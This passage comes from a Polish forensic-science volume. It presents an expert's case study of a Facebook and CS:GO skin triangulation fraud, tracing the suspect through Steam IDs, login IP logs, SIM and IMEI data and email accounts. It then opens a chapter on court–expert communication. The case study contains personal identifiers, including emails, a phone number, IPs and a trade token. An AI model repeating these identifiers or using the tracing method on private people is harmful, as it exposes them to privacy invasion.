Komendę Powiatową Policji w Sanoku postępowanie przygotowawcze w sprawie
oszustwa przy zakupie słuchawek bezprzewodowych na portalu Facebook.com od osoby
o danych Olaf Wilk o wartości 250zł na szkodę pokrzywdzonego, jakie miało miejsce w
dniu 30 listopada 2021r.
Pokrzywdzony znalazł na Facebooku ofertę sprzedaży słuchawek
bezprzewodowych AirPods 2 wystawioną przez użytkownika o nazwie „Olaf Wilk”. W
trakcie korespondencji ustalili, że płatność w kwocie 250zł zostanie dokonana BLIK-iem
na numer telefonu 691 xxx xxx (innej osoby niż sprawca – jak się później okazało) i tak
też w dniu 30.11.2021r zostało zrobione. Po kilku dniach pomimo zapewnień o wysłaniu
zakupionego towaru, kontakt ze sprzedającym się zakończył, zaś zamówiony towar nie
dotarł ani nie zostały zwrócone pieniądze. Użytkownik o nazwie „Olaf Wilk” dokonał
zmiany nazwy na „Krzysztof Mysza”. To jedno z zachowań sprawcy.
Kolejne zachowanie powiązane z powyższym to transakcja zakupu
przedmiotu – skina w CS GO, w dniu 30.11.2021r, na portalu Allegro.pl przez osobę
dysponującą kontem o nazwie: Olaf137G. Sprzedający Michał K, w dniu 01.12.2021r o
godz.08:15 dokonał wymiany skina z użytkownikiem platformy Steam posługującym się
nickiem „Bobby” z wykorzystaniem linku wymiany:
https://steamcommunity.com/tradeoffer/new?partner=319846596&token=g66ss4Gdy
oraz - co ważne - będąc przekonanym, że otrzymane w dniu 30.11.2021r pieniądze, jakie
trafiły na jego konto bankowe pochodzą od osoby, która dokonała zakupu skina. Jak
ustalono w sprawie użytkownik który dokonał zakupu skina, na dzień 01.12.2021r na
portalu www.steamcommunity.com posługiwał się nickiem „Bobby”, jednak po
transakcji dokonał zmiany nazwy z „Bobby” na „7461237832163”.
W przypadku pokrzywdzonego Wojciecha G, sprawca posługiwał się na
Facebooku początkowo nazwą „Olaf Wilk” a następnie dokonał zmiany nazwy na
„Krzysztof Mysza”.
ANALIZA ZABEZPIECZONYCH ŚLADÓW ELEKTRONICZNYCH
KONTO NA PORTALU ALLEGRO.PL O ID UŻYTKOWNIKA: 103383942
• Login: Olaf137G
• Imię i nazwisko: brak danych
• Adres e-mail: olafwilk7@gmail.com
• Numer telefonu: brak danych
Konto założone w dniu 21.11.2021r o godz.23:02:14 z najprawdopodobniej adresu IP
37.248.163.143 należącego do operatora Polkomtel sp zoo – najprawdopodobniej
221
użytkownik karty SIM nr 721 38x xxx Artur W, a z której to karty, w tym samym dniu,
jak i następnych do 03.12.2021r, logowano się do wskazanego konta. Jak ustalono z tym
kontem na Allegro powiązany był adres poczty e-mail: olafwilk7@gmail.com.
Założenie poczty elektronicznej – służącej do potwierdzenia tożsamości
przy zakładaniu konta użytkownika w domenie Allegro.pl nastąpiło w dniu 02.11.2021r
o godz.15:16:36 UTC z adresu IP 37.248.211.243 należącego do operatora Polkomtel,
jednak użytkownika końcowego tego adresu IP nie ustalono z uwagi na brak portu
źródłowego.
Diagram 5 – powiązania między Olafem Wilk a Jakubem W wynikające z
korespondencji między Olafem Wilkiem a Michałem K. dotyczącej sprzedaży skina do
gry CS.GO na portalu Allegro.pl i konta użytkownika Steam któremu przekazany został
skin oraz powiązania Olafa Wilka z użytkownikiem portalu Facebook oferującym
słuchawki bezprzewodowe Wojciechowi G. (materiały własne)
DOWODY ZABEZPIECZONE PRZEZ POKRZYWDZONEGO
Korespondencja ze sprawcą
Pierwszy z pokrzywdzonych, Wojciech G. za pośrednictwem posiadanego
konta na portalu Facebook.com znalazł ogłoszenie informujące o sprzedaży słuchawek
bezprzewodowych AirPods 2 za kwotę 250zł przez użytkownika posługującego się nazwą
„Olaf Wilk”. Podczas korespondencji ze sprzedającym (prowadzonej z wykorzystanie
Messengera) ustalili, że płatność nastąpi z wykorzystaniem aplikacji BLIK na podany
222
przez sprzedającego numer telefonu 691 xxx xxx. Pokrzywdzony potwierdził ofertę, a
kupujący podający się za Olafa Wilka, przesłał mu wskazany wyżej numer telefonu, na
który pokrzywdzony dokonał płatności kwoty 250zł aplikacją BLIK. Po dokonaniu
płatności opłacony towar nie dotarł, zaś sprzedający dokonał zmiany nazwy konta z „Olaf
Wilk” na „Krzysztof Mysza”. Treść całości korespondencji prowadzonej między
pokrzywdzonym Wojciechem G. a Olafem Wilk (Krzysztof Mysza) pozyskano od
pokrzywdzonego i zabezpieczono.
Rys. 22 Korespondencja między pokrzywdzonym Wojciechem G a sprawcą oszustwa, gdzie
podano numer telefonu do płatności BLIK (jasne miejsce) (materiały własne)
223
Rys. 23 Zrzut ekranowy sporządzony przez pokrzywdzonego z rozmowy ze sprawcą oszustwa, z
widocznym numerem ID konta użytkownika, z którym prowadzono rozmowę (materiały własne)
https://www.facebook.com/messages/t/4391734537604573
KONTO UŻYTKOWNIKA FACEBOOK O ID: 4391734537604573
– nie pozyskano danych z uwagi na jego usunięcie
Pokrzywdzony Wojciech G. - nie mając wątpliwości co do przebiegu
transakcji i otrzymania opłaconego towaru – dokonał płatności BLIK w kwocie 250zł na
podany mu numer telefonu (691 xxx xxx) należący – jak później ustalono do osoby
Michała K (sprzedawcy skina w CS GO) – co pozwoliło sprawcy otrzymać zamówiony
u niego towar w postaci skina karabinu w grze CS GO.
Diagram 6 – powiązania między Olafem Wilk a Jakubem W. wynikające
podczas korespondencji między sprawcą a Wojciechem G. dotyczącej sprzedaży
słuchawek bezprzewodowych na portalu Facebook oraz korespondencja między
pokrzywdzonymi Wojciechem G. i Michałem K. (materiały własne)
224
ANALIZA ZABEZPIECZONYCH ŚLADÓW ELEKTRONICZNYCH
ZWIĄZANYCH Z UŻYTKOWNIKIEM PLATFORMY STEAM
Mając na uwadze powyższe zabezpieczone przez Michała K, zrzuty
ekranowe dot. korespondencji oraz zmian nazwy użytkownika na portalu
steamcommunity.com, dokonano analizy zabezpieczonych danych na podstawie których
bezspornie przyjęto, że sprawcą czynu na szkodę Wojciecha G. jest osoba korzystająca z
konta o danych „74612378332163” (na dzień 21.02.2022r). Potwierdziły to zebrane i
zabezpieczone w ramach dokonanego wywiadu jawnoźródłowego czynności, które
wykazały, że w czasie wymiany użytkownikiem przejmującym przedmiot od Michała K.
był użytkownik społeczności www.steamcommunity.com o danych: „Bobby”.
W wyniku przeprowadzonych czynności w ramach OSINT, ustalono, że
użytkownik ten posiada konto o unikalnych identyfikatorach:
• steam3ID: [U:1:319846596],
• steamID32: STEAM_0:0:159923298,
• steamID64:
http://steamcommunity.com/profiles/76561198280112324,
• custom URL: https://steamcommunity.com/id/ 7461237832163
• steamrep: http://steamrep.com/profiles/ 76561198280112324
które jak się okazało - po zebranych dalszych danych – związane było z
użytkownikiem, którym okazał Jakub W. Dane na podstawie których wykazano jego
związek ze zdarzeniem przedstawiono poniżej.
KONTO NA PORTALU STEAM:
Informacje pozyskane od pokrzywdzonego Michała K
Bobby (stan na 01.12.2021r)
Rys. 24 Awatar użytkownika Bobby (materiały własne)
Użytkownik: 74612378332163 (stan na 21.02.2022r)
Rys. 25- awatar użytkownika 7461237832163 (materiały własne)
Użytkownik: 8553281437 (stan na 02.05.2022r)
Rys.26 Awatar użytkownika 8553281437 (materiały własne)
225
KONTO NA PORTALU STEAM: 7461237832163
Informacje pozyskane od Valve, z dnia 04.04.2022r
• Użytkownik: 7461237832163
• Użytkownik konta od dnia 29.01.2016r
godz.12:11:15
• Adresy e-mail związane z powyższym kontem:
• j.w0111@gmail.com – nowy adres e-mail
zweryfikowany
• jakub.osieki@op.pl – stary adres e-mail
Rys. 27 -awatar użytkownika
7461237832163 (materiały własne)
Tabela 3. Telefony zarejestrowane i zweryfikowane na koncie użytkownika:
L.p.
Nr telefonu
Data dodania/
usunięcia
Data weryfikacji
Status
1.
793 245 894 – anonimizacja danych
05.06.2017r
15.02.2016r
zweryfikowany
2.
721 3xx xxx, Wioletta W,
15.01.2020
05.06.2017r
zweryfikowany
3.
721 38x xxx, Artur W,
15.01.2020
15.01.2020r
zweryfikowany
SZCZEGÓŁY PROFILU (według stanu na dzień 04.04.2022r - odpowiedź z Valve)
• steamID3: [U:1:319846596],
• steamID32: STEAM_0:0:159923298,
• steamID64:
http://steamcommunity.com/profiles/76561198280112324,
• "Real" Name: 7461237832163
• Profile URL: 7461237832163
Tabela 4. Wybrane logowania do konta Steam w okresie 06.11.2021r do 13.12.2021r
Data
Godzina
UTC
Adres IP
Operator/Uwagi
25.11.2021
07:28:59
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
25.11.2021
09:48:46
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
26.11.2021
08:56:59
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
26.11.2021
09:20:13
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
26.11.2021
12:32:59
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
26.11.2021
15:19:55
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
27.11.2021
01:24:59
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
27.11.2021
03:57:59
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
27.11.2021
08:14:59
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
28.11.2021
03:35:59
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
226
28.11.2021
10:40:20
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
29.11.2021
04:56:59
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
29.11.2021
08:21:02
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
30.11.2021
04:46:00
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
30.11.2021
07:19:59
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
30.11.2021
09:28:59
5.173.136.79
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
10.12.2021
10:06:34
5.173.140.154
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
13.12.2021
06:09:25
5.173.138.120
P4 PLAY/karta SIM o nr 578 4xx xxx Artur W
Analiza całości logowań do konta użytkownika o unikalnych identyfikatorach:
• steamID3: [U:1:319846596],
• steamID32: STEAM_0:0:159923298,
• steamID64: http://steamcommunity.com/profiles/76561198280112324
W trakcie postępowania ustalono, że w chwili dokonywania wymiany
skina między pokrzywdzonym Michałem K a osobą posługującą się wtedy nazwą
„Bobby”, jakie miało miejsce w dniu 01.12.2021r użytkownik konta logował się z adresu
IP 5.173.140.154 operatora P4 PLAY, który w tym czasie był przydzielony
użytkownikowi karty SIM o numerze abonenckim 578 4xx xxx – zarejestrowanej na dane
Artur W, współpracującej z modemem ZTE MF821 o numerze IMEI 86117300166414(6),
pozostającym w zasięgu stacji BTS Papowo.
KONTO NA PORTALU STEAM: 8553281437
Informacje pozyskane w wyniku przeszukania dostępnych jawnych
zasobów sieci Internet
Użytkownik konta od dnia: 29.01.2016r
Użytkownik: 8553281437 (stan na 16.05.2022r)
Rys. 28 Awatar użytkownika 8553281437 (materiały własne)
227
Tabela 5. Zmiany (wybrane) pseudonimów użytkownika: 8553281437 (stan na 29.05.2022r)
Data
Zmiana pseudonimu
steam3ID
steamID32
steamID64
29.04.2022
**
8553281437
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
01.03.2022
**
7461237832163
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
*
Bobby
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
*
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
21.03.2021
**
Little Planet
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
22.02.2021
**
Blue
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
09.02.2021
**
Top1Jungler
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
25.01.2021
**
Sonic
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
16.12.2020
**
Plock to kurczak
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
21.10.2020
**
walden
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
*
kozakjam
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
21.08.2020
**
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
228
Data
Zmiana pseudonimu
steam3ID
steamID32
steamID64
19.08.2020
**
YES cs.money
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
04.06.2020
**
YES
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
31.03.2020
**
RED
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
25.02.2020
**
CyceDonice/cs.money
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
01.12.2017
**
Avast Free Antivirus
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
04.10.2017
**
BOT#69 – CS.MONEY
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
24.02.2017
**
Artur
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
16.10.2016
**
Posejdon Władca Mórz
[U:1:319846596]
STEAM_0:0:159923298
steamcommunity.com/profiles/76561198280112324
* Brak wpisu w kolumnie: „Data” wynika z braku możliwości precyzyjnego ustalenia daty dokonanej zmiany w nazwie użytkownika.
** Pozostałe daty zmiany nazwy mogą być opatrzone marginesem błędu z uwagi na usuwanie nazw przez użytkownika.
229
Potwierdzeniem dokonywania zmian nazw (nicku) użytkownika
portalu Steam przez sprawcę posługującego się podczas wymiany nazwą „Bobby”,
było zeznanie świadka Michała K oraz w szczególności dołączone przez niego
zrzuty ekranowe dot. wymiany z użytkownikiem o nicku „Bobby” oraz przesłane
biegłemu w terminie późniejszym dane, co do wymiany, z widoczną zmianą na
nazwy „7461237832163” i „8553281437”.
Rys. 29 Potwierdzenie wymiany (po zmianie nazwy Bobby) (materiały własne)
Analiza dostępnych zasobów sieciowych wykazała dodatkowo
bezsprzeczną tożsamość unikalnych identyfikatorów między użytkownikami
portalu Steam o nazwach: Bobby, 7461237832163 czy ostatnią (na dzień
29.05.2022r) - 8553281437 (oraz innych wykazanych w tabeli powyżej) a
kontem o profile permalinku
www.steamcommunity.com/profiles/76561198280112324.
Występujące zbieżności ukazują poniższe, zabezpieczone zrzuty
ekranowe pozyskane przez biegłego drogą OSINT z internetu.
Rys. 30 Awatar 7461237832163
materiały własne) Rys. 31 - awatar 8553281437
(materiały własne)
230
Rys. 32 Awatar 8553281437 (materiały własne)
Diagram 7 – powiązania osoby Jakub W z kontem na platformie Steam i
używanymi tam nazwami (materiały własne)
TRANSAKCJA WYMIANY DOKONANA PRZEZ MACIEJA K.
I INFORMACJE O NIEJ ZAWARTE NA PORTALU STEAM
Jak wynikało z dostarczonych przez Macieja K zrzutów
ekranowych dot. transakcji, na jego koncie na platformie Steam odnotowywane są
231
wszystkie transakcje, jakie zostały wykonane przez niego, gdzie na zrzucie
ekranowym dostarczonym do Komendy Powiatowej Policji w Sanoku w dniu
21.02.2022r widoczna była transakcja z dnia 01.12.2021r godz. 08:15 z
użytkownikiem o nicku „Bobby”.
Z zeznań Michała K, wynikało, że na dzień 01.12.2021r sprawca
oszustwa posługiwał się już zmienionym nickiem użytkownika tzn.
„7461237832163”, a nie tym z jakiego korzystał dokonując wymiany czyli:
„Bobby”. O tym, że strona Steam automatycznie aktualizuje dane dot. nazwy
nicka używanego aktualnie przez użytkowników platformy, świadczą poniższe
zrzuty ekranowe dostarczone w dniu 21.02.2022r, jak i przekazane biegłemu w
terminach późniejszych (04.04.2022r oraz 03.05.2022r), z których to wynikało
bezspornie, że użytkownik, z którym doszło do wymiany (stan na dzień
03.05.2022r) – to użytkownik na ten dzień posługującym się nickiem –
8553281437.
Rys. 33 Widok konta użytkownika Rys. 34 Widok konta użytkownika
(na dzień 01.12.2021r) (materiały własne) (na dzień 04.04.2022r) (materiały własne)
Rys. 35 Widok konta użytkownika (na dzień 03.05.2022r)
(materiały własne)
Przykładem jednoznaczności tej identyfikacji są powyższe zrzuty
ekranowe, zabezpieczone od Michała K, gdzie aktualizacja nazwy następuje
automatycznie, niezwłocznie po zmianie nazwy użytkownika na nową. Co ważne
– z uwagi na fakt, iż możliwe jest, że podczas zakładania konta na
www.steamcommunity.com jeden lub kilku użytkowników będzie używało takiej
samej nazwy, to właśnie adres URL (mogący podlegać zmianom przez
użytkownika) oraz przede wszystkim indywidualny, niezmienny i stały
identyfikator steamcommunity (profile permalink) są tymi, które jednoznacznie
zidentyfikują właściwego użytkownika.
232
WYMIANA PRZEDMIOTU (SKINA) Z WYKORZYSTANIEM
PRZESŁANEGO TOKENA
Bobby
Rys. 36 Przebieg identyfikacji osoby, która dokonała zakupu skina od Michała K,
posługującej się nazwą użytkownika „Bobby” (na podstawie danych znajdujących się w
aktach sprawy i dokonanego wywiadu OSINT)
233
Diagram 8 – występujące powiązania między osobą Jakub W, kontem tego
użytkownika na platformie Steam o profilu permalinku
steamcommunity.com/profiles/76561198280112324 oraz oszukańczą wymianą z
Michałem K w dniu 01.12.2021r (materiały własne)
Analiza danych pozyskanych zarówno przez organy ścigania oraz
biegłego a związanych z logowaniami do kont poczty e-mail, wykazała, że z tych
samych adresów IP (należących do operatora Polkomtel i P4 PLAY) logowano się
w dniu 11.01.2022r do obydwu kont pocztowych, przy czym w przypadku
logowań z adresu IP 5.173.136.196 ustalono użytkownika końcowego, którym był
użytkownik karty SIM o nr abonenckim 578 4xx xxx zarejestrowanej na dane
Artur W, ojciec Jakuba W. Mając powyższe na uwadze należało przyjąć, że w
przypadku logowań z dnia 11.01.2022r użytkownikiem adresu IP 31.0.76.165,
była ta sama osoba, która korzystała ze wskazanej wyżej karty SIM sieci P4 PLAY
lub osoba, której użytkownik wskazanych kont pocztowych udostępnił loginy i
hasła umożliwiające dokonanie logowań. Osobą tą był Jakub W lub znana mu
osoba, której udostępnił potrzebne dane umożliwiające dokonanie logowań. Brak
było danych wskazujących na to że dokonano nielegalnego przejęcia wskazanych
kont pocztowych.
234
Diagram 9 – występujące powiązania osoby Jakuba W z kontem użytkownika na
platformie Steamcommunity o nazwie Bobby, ze wskazanym użytkownikiem
portalu Allegro.pl – Olaf137G, wskazaną pocztą e-mail oraz sprawcą o danych
Olaf Wilk (materiały własne)
Dokonana całościowa analiza danych jakie pozyskano w sprawie
wykazała, że oszustwo na szkodę Wojciecha G, dokonane za pośrednictwem konta
w domenie Facebook, przez osobę posługującą się danymi „Olaf Wilk”, zostało
dokonane przez Jakuba W lub znaną mu osobę, której udzielił on dostępu do
posiadanego konta w domenie Steam. Z analizy tych danych wynikało ponadto,
że miejsce działania sprawcy w chwili wystawienia ogłoszenia o sprzedaży
słuchawek bezprzewodowych na Facebooku za kwotę 250zł powiązane było
bezsprzecznie z zakupem oferowanego przez Michała K skina karabinu do gry
CS.GO na portalu Allegro.pl.
W obydwu przypadkach – sprzedaż słuchawek oraz zakupu skina
do gry - osoba posługiwała się danymi „Olaf Wilk” i wiedziała o tym, że wartość
zakupu skina wynosi 250zł i za taką samą kwotę wystawiła ofertę sprzedaży
słuchawek. O tym, że sprawcą była jedna i ta sama osoba (albo dwie osoby
współdziałające ze sobą) świadczy podanie Wojciechowi G numeru
abonenckiego telefonu Michała K (691 xxx xxx) jako numeru do zapłaty BLIK na
telefon za wystawione słuchawki bezprzewodowe, który numer znała tylko osoba
235
Diagram 10 – występujące powiązania między kontem użytkownika na
platformie Steam o profile permalinku
steamcommunitu.com/profiles/76561198280112324 a nazwami użytkownika:
m.in. Bobby, 746123732163, 8553281437 i inne (materiały własne)
236
z którą Michał K prowadził korespondencję w dniach 25.11.2021r do 01.12.2021r
i podał go sprawcy w dniu 28.11.2021r o godz.21:37. Ustalenie miejsca działania
sprawcy w chwili oszustwa z uwagi na brak informacji od Facebbok (z uwagi na
usunięcie wykorzystywanego przez sprawcę konta użytkownika) - nie było
możliwe.
Na podstawie zabezpieczonych i znajdujących się w aktach sprawy śladów
elektronicznych nie możliwe było wskazanie jednoznacznie osoby (jej danych
osobowych), która dokonała umieszczenia ogłoszenia o sprzedaży słuchawek na
portalu Facebook.com z przyczyn ukazanych powyżej. Można jednak – i to zostało
wykonane – wskazać krąg osób mających niewątpliwy i niezaprzeczalny związek
z zaistniałym zdarzeniem przestępczym. Ustalenie charakteru i związku
poszczególnych osób w przedmiotowym zdarzeniu leżało w gestii organów
procesowych i zostało to ustalone, o czym świadczy prawomocny wyrok sądu w
przedmiotowej sprawie.
Przedstawione powyżej dwie sprawy wyraźnie wykazały, że jeżeli:
• jest zaangażowanie i podstawowa wiedza ze strony prowadzącego
postępowanie referenta,
• wszystkie (a przynajmniej podstawowe) ślady i dowody elektroniczne
zostały zabezpieczone,
• jest dobra (nie tylko zawężona do wydania postanowienia o powołaniu)
współpraca z biegłym,
to z pozoru skomplikowana (być może dla niektórych referentów) sprawa, z góry
skazana na umorzenie z uwagi na niemożliwość (nierealność a może raczej
nieprawdopodobieństwo) ustalenia sprawcy, znajdzie swój (pozytywny) finał w
sądzie, a platforma CS GO nie jest (jednak) dobrym miejscem dla oszustów.
237
O PROBLEMACH KOMUNIKACJI MIĘDZY ORGANEM
PROCESOWYM A BIEGŁYM. WYBRANE PRZYPADKI
ABOUT COMMUNICATION PROBLEMS BETWEEN THE PROCEDURAL
AUTHORITY AND THE EXPERT. SELECTED CASES.
Dr Maciej SZMIT
1
Uniwersytet Łódzki
Streszczenie
Rozdział poświęcony jest analizie wybranych problemów komunikacji między
biegłym sądowym a organem procesowym, które mogą prowadzić do sytuacji
niepożądanych z punktu widzenia sprawności, szybkości i prostoty postępowania,
bądź nawet do wydania niesprawiedliwych rozstrzygnięć.
Słowa kluczowe: opiniowanie sądowe, biegli sądowi
Summary
The chapter is devoted to the analysis of selected communication problems
between a legal expert and a court or prosecutor, which may lead to undesirable
situations concerning efficiency, speed and simplicity of the proceedings, or even
to unfair decisions.
Keywords: forensics, legal experts
Wstęp
Można zaryzykować twierdzenie, że nienajlepsza atmosfera wokół
wymiaru sprawiedliwości jest jego immanentną przypadłością: jedną z cech
postępowań sądowych jest kontradyktoryjność, często więc przynajmniej jedna ze
stron, po zakończeniu procesu jest niezadowolona
2
, niemniej błędy i pomyłki w
funkcjonowaniu sądów stosunkowo często zyskują duży oddźwięk medialny i
przyczyniają się do popsucia tej atmosfery ponad miarę. Biegli sądowi i ich opinie
mają związek z problemami prowadzącymi do nieprawidłowości w działaniu
sądów czy organów prowadzących postępowania przygotowawcze na dwa
sposoby: bądź to jako przyczyna problemów (na przykład naruszając zasady
bezstronności, i rzetelności, wydając opinie wewnętrznie sprzeczne,
1
E-mail: maciej.szmit@uni.lodz.pl; ORCID: 0000-0002-6115-9213
2
Zdarzają się wprawdzie sytuacje, w których wyrok satysfakcjonuje wszystkie spierające się strony
(na przykład, gdy w sporze cywilnym obie wybrały drogę sądową jako obiektywny sposób
rozstrzygnięcia, zbyt dla nich samych złożonego sporu; na takim podejściu oparta jest na przykład
idea arbitrażu, czy – w niektórych krajach – sądów pokoju), zdarzają się jednak również i takie, po
których wszystkie strony czują się pokrzywdzone.
238
nieprawdziwe, niezrozumiałe, wykraczające poza zlecony zakres, bądź go nie
wyczerpujące, nie wydając ich na czas, wydając je w nienadającej się do
wykorzystania formie, niszcząc bez potrzeby materiał dowodowy etc.), bądź to
jako uczestnik postępowania niewłaściwie potraktowany przez jego gospodarza.
Poniżej omówiono kilka przypadków tego rodzaju sytuacji, z którymi autor miał
okazję zetknąć się w czasie swojej działalności w roli biegłego sądowego. Choć
oczywiście tego rodzaju „dowody anegdotyczne” nie mogą rościć sobie pretensji
do daleko idących uogólnień, być może mogą być pomocne jako swoiste studia
przypadków.
Czy sąd zna prawo?
Starożytna zasada iura novit curia oznacza, że na sądzie spoczywa
obowiązek poszukiwania odpowiednich przepisów prawa i stosowania ich we
właściwy sposób. Oczywiście wiadomo, że zdarzają się sytuacje, w których
sędziowie popełniają błędy. W takich wypadkach zabezpieczeniu interesów
uczestników postępowania (jak i samego wymiaru sprawiedliwości) systemowo
służy zasada dwuinstancyjności postępowania
3
oraz środki odwoławcze.
Problematyczna sytuacja może wystąpić, gdy organ powołujący biegłego usiłuje
sformułować swoją decyzję w sposób nie przewidziany przepisami prawa, z
natury rzeczy bowiem przepisy nie przewidują środków odwoławczych w
nieznanych im sytuacjach. Spotykaną złą praktyką są tu rozmaitego rodzaju ustne
sugestie pod adresem biegłych, np. odnośnie do sposobu prowadzenia badań, co
narusza zasadę autonomii biegłego w zakresie wyboru metod badawczych (por.
np. [1]) albo – co jest dość często spotykaną praktyką – odnośnie do
samodzielnego przeprowadzenia „oględzin” dowodów rzeczowych
4
. Autor
niniejszego tekstu miał okazję zmierzyć się z sytuacją, w której otrzymał pismo
przesłane przez jeden z sądów rejonowych zatytułowane „Doręczenie”, którego
fragmenty pokazano na rysunku 1.
Do pisma dołączona była opinia pełnomocnika procesowego jednej
ze stron podnosząca wątpliwości odnośnie do opinii i zawierająca sugestie, że
biegły powinien samodzielnie uzupełnić zakres opinii, przeprowadzić z własnej
inicjatywy badanie komputera jednej ze stron itd. Pomijając formalne i
3
W postępowaniu przygotowawczym do tego celu służy kontrola instancyjna oraz – w niektórych
przypadkach – kontrola sądowa, a także środki zaskarżenia, w tym środki odwoławcze.
4
Oględziny są czynnością organu procesowego (sądu) nie zaś biegłego. Samodzielne „wyprawy
biegłego po dowody” są z punktu widzenia zasad postępowania czy to karnego, czy cywilnego oraz z
punktu widzenia interesów biegłego, co najmniej mocno ryzykowne: o ile jasne jest, że np. biegły z
zakresu szacowania nieruchomości może – a zapewne często nawet powinien – obejrzeć
nieruchomość, o której się wypowiada, o tyle w przypadku biegłego informatyka może wchodzić w
grę szereg sytuacji niepożądanych (np. wskazanie przez kogoś niewłaściwego komputera, sugestia,
że biegły komputer uszkodził bądź zmienił zawartość jego pamięci), których ryzyko powinno być
brane pod uwagę. Ponadto biegły nie może nadać badanemu urządzeniu statusu materiału
dowodowego (dowodu rzeczowego), ani procesowo go zabezpieczyć (w szczególności z własnej
inicjatywy odebrać stronie) itd. Jeśli nawet jednak uznać, że jakieś badanie sprzętu w siedzibie strony
jest czynnością biegłego, to na pewno badanie to nie da się nazwać oględzinami, oględziny bowiem –
jak napisano powyżej – są czynnością organu procesowego.
239
merytoryczne błędy samej korespondencji pełnomocnika strony z sądem, samo
pismo dostarczone biegłemu jest swoistym curiosum, poczynając już od jego
tytułu (doręczenie jest czynnością, a nie dokumentem), poprzez sam tok
rozumowania (uznanie, że niezadowolenie strony z treści opinii uprawnia sąd do
jej uznania za nieprzydatną i że uznanie jej za nieprzydatną może skutkować
odmową wypłaty wynagrodzenia za wykonaną pracę), aż do niespotykanej formy.
Gdyby niezadowolenie którejś ze stron z opinii biegłego miało świadczyć o jej
nieprzydatności, należałoby uznać, że przytłaczająca większość opinii jest
nieprzydatna, bowiem zazwyczaj któraś ze stron jest niezadowolona, jeśli nie z
formy opinii to z jej konkluzji, którą uznaje za pogarszającą jej pozycję w
postępowaniu.
Rys. 1. "Doręczenie" przekazane biegłemu.
Źródło: opracowanie własne.
Nie jest też rzeczą biegłego komentować sensowność zadawanych
mu pytań, szczególnie w postępowaniu cywilnym; nawet jeśli ocenia je jako
ewidentnie bezcelowe z punktu widzenia, czy to interesów zadającej je strony, czy
dojścia do prawdy materialnej, musi udzielić na nie odpowiedzi. To sąd bowiem
uznaje pytanie za dopuszczalne i to sąd zleca biegłemu wydanie opinii, za
wykonanie której to pracy należy się biegłemu wynagrodzenie, nawet jeśli
240
odpowiedź okaże się dla sądu i z punktu widzenia przedmiotu sporu nieistotna czy
nieinteresująca. Zdarza się, ze strony zadają pytania, odpowiedź na które pogarsza
wręcz ich sytuację w procesie, ale to już nie jest problem biegłego. To samo
dotyczy konstatacji biegłego o niemożliwości udzielenia odpowiedzi na pytanie,
czy to z przyczyn formalnych (gdy jego treść jest niedopuszczalna, np. wykracza
poza zakres dyscypliny, którą reprezentuje biegły), czy merytorycznych (gdy w
oparciu o dostępny materiał nie można uzyskać żądanej informacji); biegłemu
należy się wynagrodzenie za wykonaną pracę, nawet jeśli jest nią uzasadniona
odpowiedź, że na zadane pytanie nie może on udzielić odpowiedzi: „(…) brak
odpowiedzi na pytanie Sądu zlecającego ekspertyzę nie oznacza automatycznie,
że opinia jest niepełna, jeżeli przyczyna braku odpowiedzi lub jej ograniczonego
zakresu została racjonalnie i przekonywująco wyjaśniona przez biegłego. W
konkretnych przypadkach niemożliwość udzielenia odpowiedzi na pytanie sądu,
nie wyklucza wartości poznawczej opinii i w niczym nie obciąża biegłego.
Żądanie zaś odpowiedzi wbrew wiedzy biegłego i wbrew okolicznościom
uniemożliwiającym jej udzielenie, jest po prostu niedopuszczalne”. Postanowienie
Sądu Apelacyjnego we Wrocławiu z 19 stycznia 2012 r. (II A Kz 23/12, niepubl.).
W opisanej wyżej sytuacji biegły zwrócił się do prezesa sądu z
prośbą o wyjaśnienie zaistniałej sytuacji (zob. rys. 2). W konsekwencji biegły
otrzymał wynagrodzenie za wydaną opinię.
241
Rys. 2. Pismo biegłego do prezesa sądu.
Źródło: opracowanie własne.
Do podobnej, choć mniej merytorycznie istotnej, sytuacji doszło w
